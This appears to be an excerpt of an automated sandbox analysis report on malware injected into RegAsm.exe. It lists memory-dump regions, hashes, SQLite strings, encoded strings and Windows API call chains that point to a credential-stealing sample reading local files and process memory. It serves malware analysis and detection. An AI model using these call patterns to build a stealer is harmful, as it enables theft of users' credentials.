                                              • Instruction Fuzzy Hash: C2510371C04149EEDB05EBE5C995ADEBBB8AF14308F50419EE10573182DBB86BC8CBA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
                                              • API String ID: 0-3918257174
                                              • Opcode ID: 8ba178efed5bc19252f50ac34b4004406130504084e7a6eba37f69bb8e620c1e
                                              • Instruction ID: ba980aa02b2dead1c9cdd9f8e43797d4e0820f0ed64ea0c20b1f74169ff431f8
                                              • Opcode Fuzzy Hash: 8ba178efed5bc19252f50ac34b4004406130504084e7a6eba37f69bb8e620c1e
                                              • Instruction Fuzzy Hash: 0D5105719403129BC750AF34DC85BDE7BA8EF84A65F090625FC49DB281D735EA09CBA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-2988319395
                                              • Opcode ID: 405c164cbb1ef4d7aa405a98bb33d36cb91dbaf73fb6e62e6ee842295822457d
                                              • Instruction ID: fffd8338cd685674de04a7fb06bfe2b301cdf7c6bbdf34663cf2a57a168b8444
                                              • Opcode Fuzzy Hash: 405c164cbb1ef4d7aa405a98bb33d36cb91dbaf73fb6e62e6ee842295822457d
                                              • Instruction Fuzzy Hash: 77D19DF09043429FDB108F24ACC9BDB77E4BF64B15F045529E89A8B241E735E548CBA6
                                              Strings
                                              • UNIQUE constraint failed: %s.%s, xrefs: 1B764BC9
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B764C2A
                                              • %s at line %d of [%.10s], xrefs: 1B764C39
                                              • SELECT * FROM %Q.%Q, xrefs: 1B764B25
                                              • rtree constraint failed: %s.(%s<=%s), xrefs: 1B764BF9
                                              • misuse, xrefs: 1B764C34
                                              • API called with finalized prepared statement, xrefs: 1B764C1E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$rtree constraint failed: %s.(%s<=%s)
                                              • API String ID: 0-2013246442
                                              • Opcode ID: c19190d05319c6f4bf030e4c10d4ec39d05282ce69e7673155aa080fba3cc300
                                              • Instruction ID: 1f983519b2a959fe8d07c5df08da3c2f6f0a64d3c326ff9b94a69122a1fd0b1c
                                              • Opcode Fuzzy Hash: c19190d05319c6f4bf030e4c10d4ec39d05282ce69e7673155aa080fba3cc300
                                              • Instruction Fuzzy Hash: 6A4104B1901215AFFB015F659C85FEF36ACEF90B55F000529FD4896380EB21E954C6B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s%c%s$winFullPathname1$winFullPathname2
                                              • API String ID: 0-2846052723
                                              • Opcode ID: c49aaa62b5141cbe15973aa12150079d7d3cbd9479e4807ce3037fffb8dfe3ad
                                              • Instruction ID: 9f728c80bd2f305f4939646f7bc31748fe1c527e4e8c7188ed475034936209f6
                                              • Opcode Fuzzy Hash: c49aaa62b5141cbe15973aa12150079d7d3cbd9479e4807ce3037fffb8dfe3ad
                                              • Instruction Fuzzy Hash: 4B41CBE9A473452EEB116B24FC42FEB77999F91E14F14402CF4CF5F180DA22E446C262
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: SELECT * FROM %Q.%Q$SELECT * FROM %Q.'%q_rowid'$Schema corrupt or not an rtree$_parent$_rowid
                                              • API String ID: 0-2087119806
                                              • Opcode ID: 6820741b4461074b8b8520fd7fa07b666fc9ef52ad905fdf46c52e86bd014073
                                              • Instruction ID: eb3c4e08e750c55ad34dd8dcc011d42da31176ba49465001c5b6a1f20b9d185d
                                              • Opcode Fuzzy Hash: 6820741b4461074b8b8520fd7fa07b666fc9ef52ad905fdf46c52e86bd014073
                                              • Instruction Fuzzy Hash: 0B41E1B1809351ABDB04DF64DC859EFB6EAAFD5B44F001A2DF885D3200E670E944CBA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-3679126755
                                              • Opcode ID: 32f3a7c1d9aec54d8a1249d9cdecb9a899e56f22d0c64ec8f06ba918ad0d9cec
                                              • Instruction ID: 628ef7b35ecfd87c705b1c9c663379c9d3de8d18cb46cfe23ec8e8f1a25ba9d1
                                              • Opcode Fuzzy Hash: 32f3a7c1d9aec54d8a1249d9cdecb9a899e56f22d0c64ec8f06ba918ad0d9cec
                                              • Instruction Fuzzy Hash: 8041D2716007059BEB108F78EC86FDAB2A8BF54F56F060529F599AF391EB70E480C761
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00413B4C
                                              • memset.MSVCRT ref: 00413B6D
                                              • memset.MSVCRT ref: 00413B7B
                                                • Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A
                                              • lstrcat.KERNEL32(?,00000000), ref: 00413BA7
                                              • lstrcat.KERNEL32(?), ref: 00413BC5
                                              • lstrcat.KERNEL32(?,?), ref: 00413BD9
                                              • lstrcat.KERNEL32(?), ref: 00413BEC
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00411AC5: _EH_prolog.MSVCRT ref: 00411ACA
                                                • Part of subcall function 00411AC5: GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 0040CE0C: _EH_prolog.MSVCRT ref: 0040CE11
                                                • Part of subcall function 0040CE0C: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040CE64
                                                • Part of subcall function 0040CE0C: memcmp.MSVCRT ref: 0040CEA2
                                                • Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
                                                • Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
                                                • Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
                                                • Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
                                                • Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
                                                • Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E
                                                • Part of subcall function 00411D80: GlobalAlloc.KERNEL32(00000000,z<A,00000000,00000000,?,00413C7A,?,?), ref: 00411D8B
                                              • StrStrA.SHLWAPI(00000000), ref: 00413C86
                                              • GlobalFree.KERNEL32(?), ref: 00413D55
                                                • Part of subcall function 00406D7F: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406D9F
                                                • Part of subcall function 00406D7F: LocalAlloc.KERNEL32(00000040,6d@,?,?,00406436,00000000,?,?), ref: 00406DAD
                                                • Part of subcall function 00406D7F: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406DC3
                                                • Part of subcall function 00406D7F: LocalFree.KERNEL32(00000000,?,?,00406436,00000000,?,?), ref: 00406DD2
                                                • Part of subcall function 00406EF1: _EH_prolog.MSVCRT ref: 00406EF6
                                                • Part of subcall function 00406EF1: memcmp.MSVCRT ref: 00406F1C
                                                • Part of subcall function 00406EF1: memset.MSVCRT ref: 00406F4B
                                                • Part of subcall function 00406EF1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80
                                              • lstrcat.KERNEL32(?,00000000), ref: 00413CFB
                                              • StrCmpCA.SHLWAPI(?,004276CB,?,?,?,?,000003E8), ref: 00413D18
                                              • lstrcat.KERNEL32(?,?), ref: 00413D31
                                              • lstrcat.KERNEL32(?,004279A0), ref: 00413D3F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                              • String ID:
                                              • API String ID: 174962345-0
                                              • Opcode ID: a260a71157194137b1cc3993f1025f4378958f044595c8f92f1e21ae7150c290
                                              • Instruction ID: 5d9887e4c003d5038b5018e60cbfbd063e2c5fca256328a4f076184186ad4f89
                                              • Opcode Fuzzy Hash: a260a71157194137b1cc3993f1025f4378958f044595c8f92f1e21ae7150c290
                                              • Instruction Fuzzy Hash: 0E613CB2D00119ABCF11EFE1DC49DDE7B7DAB09304F00046AF605E3161EA399B888BA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %!0.15g$%lld$JSON cannot hold BLOB values
                                              • API String ID: 0-1047910854
                                              • Opcode ID: 47e3cc6b0e037dadcfde5ede2212d180415e25b9adf3600fabcc9c5e3348695a
                                              • Instruction ID: 0f5e1dcadce0781275ba087915c97a2ee716889fe51237fb40aa84b09d453b06
                                              • Opcode Fuzzy Hash: 47e3cc6b0e037dadcfde5ede2212d180415e25b9adf3600fabcc9c5e3348695a
                                              • Instruction Fuzzy Hash: 5E51C0BA500300AEEB105A18EC47FFF37A6DF82727F14024DF946572A3EB67B54182A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$ABLE x
                                              • API String ID: 0-1763475469
                                              • Opcode ID: 735e51600c71e5a2ea50f68ef6121b5f34e72b3d3882e9d6e77ebd92276ed50e
                                              • Instruction ID: 2bda6a41ddf34bdbcd4e4c172b305b9baff700da8811e5c623d19bc24c34045b
                                              • Opcode Fuzzy Hash: 735e51600c71e5a2ea50f68ef6121b5f34e72b3d3882e9d6e77ebd92276ed50e
                                              • Instruction Fuzzy Hash: 427191B4909342DBD718CF14D940B9ABBF0FFA8704F008A5EF89897251E775E549CB92
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00410476
                                              • ??_U@YAPAXI@Z.MSVCRT ref: 0041048C
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 004104AE
                                              • memset.MSVCRT ref: 004104F0
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00410629
                                                • Part of subcall function 0040EDD8: strlen.MSVCRT ref: 0040EDEF
                                                • Part of subcall function 0040E992: memcpy.MSVCRT ref: 0040E9B2
                                              Strings
                                              • N0ZWFt, xrefs: 00410593, 004105A0
                                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00410508, 004105F1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                              • API String ID: 3050127167-1622206642
                                              • Opcode ID: 966422a928db5018832813aa3ac74893670f6df9618f4d3b7684f2012bc649dc
                                              • Instruction ID: b4c041eae0aa711b679e6422d961e358bae5c9a4c2413e7435ff6aea28d9cb08
                                              • Opcode Fuzzy Hash: 966422a928db5018832813aa3ac74893670f6df9618f4d3b7684f2012bc649dc
                                              • Instruction Fuzzy Hash: 915180B1A04219BEDB10EF95DC81AEEBB79EF44314F10007FF105A6291DAB95EC4CB69
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-860711957
                                              • Opcode ID: e42da5eb9cd5d9ba5820a338e68ce88c6392977d52b05253d56ed3144a0691c1
                                              • Instruction ID: aa374fae779a5a6cb7bf09387212b69559e2a49c05aa54c534e898c1f4360db9
                                              • Opcode Fuzzy Hash: e42da5eb9cd5d9ba5820a338e68ce88c6392977d52b05253d56ed3144a0691c1
                                              • Instruction Fuzzy Hash: 89B124B4A007469FEB10AF24AC45BDF73E8AF50715F40046CF98A87381E735E489C7A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %Q.$=%Q$PRAGMA
                                              • API String ID: 0-2099833060
                                              • Opcode ID: a6d1173411a334e2661c4dfb06b2b1d9e4e232a005fa7e6e25a70189f2df525b
                                              • Instruction ID: b840aed4b30d841310f07368d98bc4c983256bcc45d3d9e33472ca23abbe77dc
                                              • Opcode Fuzzy Hash: a6d1173411a334e2661c4dfb06b2b1d9e4e232a005fa7e6e25a70189f2df525b
                                              • Instruction Fuzzy Hash: E071E3B1B043119BDB04DF18DD85BDBB7F4AFA4714F04052AFC899B251E735E9098BA2
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00401C70
                                              • memset.MSVCRT ref: 00401C8E
